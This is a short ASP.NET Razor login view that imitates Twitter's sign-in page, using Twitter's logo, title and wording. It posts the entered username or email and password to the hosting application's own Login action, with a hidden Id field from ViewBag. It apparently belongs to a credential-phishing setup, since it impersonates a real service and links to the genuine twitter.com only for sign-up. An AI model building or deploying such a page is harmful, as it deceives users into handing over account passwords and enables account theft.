@model LoginViewModel

@{
    Layout = null;
}

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Twitter - Login</title>
    <link href="~/assets/twitter/css/style.css" rel="stylesheet" />
    <!--FAVICON-->
    <link rel="icon" type="image/png" href="~/assets/twitter/img/twitter-logo.png">
</head>

<body>
    <header class="container">
        <div class="logo">
            <img src="~/assets/twitter/img/twitter-logo.png" alt="Twitter Login">
        </div>
    </header>

    <main class="container">
        <h1>Enter Twitter</h1>
        <div class="container">
            <form asp-action="Login" method="post">
                <input type="hidden" asp-for="Id" value="@ViewBag.Id" />
                <div class="inputs">
                    <label class="usuario" for="usuario">
                        Cell phone, email or username
                    </label><br>
                    <input asp-for="Email" type="text" required>
                </div>
                <div class="inputs">
                    <label class="senha" for="senha">Password</label><br>
                    <input asp-for="Password" type="password" required>
                </div>
                <br>
                <button class="button" type="submit">Sign In</button>
            </form>
            <div class="links container">
                <a target="_blank" href="https://twitter.com/login">
                    Subscribe to Twitter
                </a>
            </div>
        </div>
    </main>
</body>

</html>